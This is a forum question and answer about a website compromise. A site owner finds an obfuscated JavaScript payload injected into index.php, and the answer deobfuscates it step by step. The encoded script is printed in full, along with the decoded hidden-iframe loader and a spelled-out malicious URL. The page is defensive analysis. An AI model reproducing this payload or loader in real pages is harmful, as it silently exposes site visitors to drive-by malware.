Home/ Questions/Q 8847611
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-14T12:13:53+00:00

I have a site. My site Was difficult yesterday, when open it with Google

  • 0

I have a site. My site Was difficult yesterday, when open it with Google Chrome, instead of my site this page is shown:

Warning: Visiting this site may harm your computer!
The website at http:... appears to host malware - Software that can hurt your 
computer or otherwise operate without your consent.
....

I viewed my page source in Chrome and I saw this script end of my code (after ):

 echo ""; echo "<script>try{if(window.document)window[\"document\"][\"body\"]=\"123\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}
n=[\"9\",\"9\",\"45\",\"42\",\"17\",\"1f\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"17\",\"41\",\"48\",\"4f\",\"41\",\"17\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"19\",\"2a\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"17\",\"4f\",\"4e\",\"3o\",\"2b\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"17\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"2b\",\"1e\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"28\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"29\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"28\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"29\",\"48\",\"41\",\"42\",\"4g\",\"28\",\"1n\",\"29\",\"4g\",\"4b\",\"4c\",\"28\",\"1n\",\"29\",\"1e\",\"2c\",\"2a\",\"1m\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"2c\",\"19\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"d\",\"9\",\"9\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"4i\",\"3m\",\"4e\",\"17\",\"42\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4f\",\"4e\",\"3o\",\"1e\",\"1j\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"2b\",\"1e\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"2b\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"42\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\"];h=2;s=\"\";if(m)for(i=0;i-631!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";

NOTE This script wasn’t in my code Before!!
What is this?! How was written in my index.php file?!

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Yes of course:

    If your pages was modified without your knowledge and accordance, there was certainly a exploit against your site.

    Out of consideration of HOW, there is a little try to discover WHAT:

    To ensure and to know more about this coded virus, we could run php from command line:

    1. Copy bad code to script, enclosing them between php tags:

    cat << eof > badscript
<?php
echo ""; echo "<script>try{if(window.doc....
n=[\"9\",\"9\",\"45\",\"42\",\"1
?>

    2. Do the first translation with php:

    php <badscript >badscript2

    now badscript2 contain a javascript encoded virus

    <script>try{if(window.document)window["document"]["body"]="1...
n=["9","9","45","42","17"...;if(v)ev(z)}}}</script>

    After reading this small script (keeping out html tags):

    sed < badscript2 -e 's/<\/\?script>//g' >badscript3

    3. little read of javascript code (I’m using emacs)

    rename s/$/.js/ badscript3 
emacs badscript3.js

    … some format operations… save…

    sed <badscript3.js -e 's/\t/        /g;s/^/    /;s/^\(.\{76\}\).*$/\1.../' 
try{
    if (window.document) window["document"]["body"]="123"}
catch (bawetawe) { 
    if(window.document){
        v=window;
        try{fawbe--}catch(afnwenew){
            try{(v+v)()}catch(gngrthn){
                try{
                    if(020===0x10) v["document"]["bo"+"dy"]="123"
                }catch(gfdnfdgber){
                    m=123;
                    if((alert+"").indexOf("n"+"a"+"ti"+"ve")!==-1) 
                        ev=window["eval"];
                }
            }
            n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41"...
            h=2;
            s="";
            if(m)for(i=0;i-631!=0;i++){
                k=i;
                if(window["document"])
                    s+=String.fromCharCode(parseInt(n[i],25));
            }
            z=s;
            if(v)ev(z)
        }
    }
}

    So can see that the interesting part is from n=[... and ev(z).
    For this, I use Mozilla’s Spidermonkey binary tool: smjs:

    After keeping out first (readable) part and some test that won’t work under commandline’s smjs, like window or document, and changing the last operation ev (defined in first part as ev=window.eval in a more smjs apropriate function (I choose: print() ;-),
    there is what a send to smjs:

    n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","...
h=2;
s="";
for(i=0;i-631!=0;i++){
    k=i;
    s+=String.fromCharCode(parseInt(n[i],25));
}
z=s;
print(z);

    4. Finaly show me this:

    smjs < badscript3.js >badscript4.js
emacs badscript4.js

    That is:

    if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe
      src='http:  --  censored virus link -- .php' width='10' height='10'
      style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http: --  censored virus link -- keen.php');
f.style.visibility='hidden';f.style.position='absolute';
f.style.left='0';f.style.top='0';
f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

    Nota: to minimise cut'n past risk i’v censored the link, they was initialy pointing to a virus:http: slash slash ragoose.ipq.co slash correcting slash imagine-ready_enter_keen.php

    Be care, but have fun!

    • 0